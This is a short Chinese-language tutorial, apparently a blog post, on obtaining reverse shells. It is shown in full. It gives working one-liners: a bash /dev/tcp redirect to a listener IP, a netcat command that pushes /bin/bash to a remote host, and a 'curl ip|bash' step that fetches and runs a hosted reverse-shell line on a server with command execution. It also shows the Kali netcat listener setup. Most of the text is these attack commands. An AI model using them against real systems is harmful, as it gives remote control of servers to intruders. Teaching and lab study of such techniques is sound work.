1.bash反彈shell
個(gè)人感覺bash反彈是最簡單、也是最常見的一種。
bash -i >& /dev/tcp/192.168.20.151/8080 0>&1
bash一句話命令詳解以下針對常用的bash反彈一句話進(jìn)行了拆分說明,具體內(nèi)容如下。
其實(shí)以上bash反彈一句完整的解讀過程就是:
bash產(chǎn)生了一個(gè)交互環(huán)境與本地主機(jī)主動(dòng)發(fā)起與目標(biāo)主機(jī)8080端口建立的連接(即TCP 8080 會(huì)話連接)相結(jié)合,然后在重定向個(gè)tcp 8080會(huì)話連接,最后將用戶鍵盤輸入與用戶標(biāo)準(zhǔn)輸出相結(jié)合再次重定向給一個(gè)標(biāo)準(zhǔn)的輸出,即得到一個(gè)bash 反彈環(huán)境。在反彈shell時(shí)要借助netcat工具反彈
Netcat 一句話反彈:Netcat反彈也是非常常用的方法,只是這個(gè)方法需要我們手動(dòng)去安裝一個(gè)NC環(huán)境
開啟外網(wǎng)主機(jī)監(jiān)聽
root@kali:~# nc -lvvp 8080
listening on [any] 8080 ...
kali : 192.168.20.151centos:192.168.20.130
先用kali開啟監(jiān)聽:然后centos執(zhí)行bash一句話。
成功反彈。
2.netcat 一句話反彈
~ nc 192.168.31.151 7777 -t /bin/bash
命令詳解:通過webshell我們可以使用nc命令直接建立一個(gè)tcp 8080 的會(huì)話連接,然后將本地的bash通過這個(gè)會(huì)話連接反彈給目標(biāo)主機(jī)(192.168.31.151)。
先開啟監(jiān)聽7777端口。
3.curl反彈shell
前提要利用bash一句話的情況下使用curl反彈shell
在存在命令執(zhí)行的服務(wù)器上執(zhí)行curl ip|bash,該ip的index文件上含有bash一句話,就可以反彈shell。
例如在自己的服務(wù)器index上寫上一句話
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
192.168.20.151就是作為監(jiān)聽端口的服務(wù)器用來得到反彈的shell。
存在一句話,利用curl反彈。kali開啟監(jiān)聽
上述內(nèi)容不知道大家學(xué)習(xí)到了嗎?網(wǎng)絡(luò)世界的安全漏洞每天都會(huì)出現(xiàn),安全知識(shí)和安全意識(shí)每個(gè)公民都應(yīng)該了解和學(xué)習(xí),有想學(xué)習(xí)網(wǎng)絡(luò)安全技能的小伙伴可以隨時(shí)私信我哦!






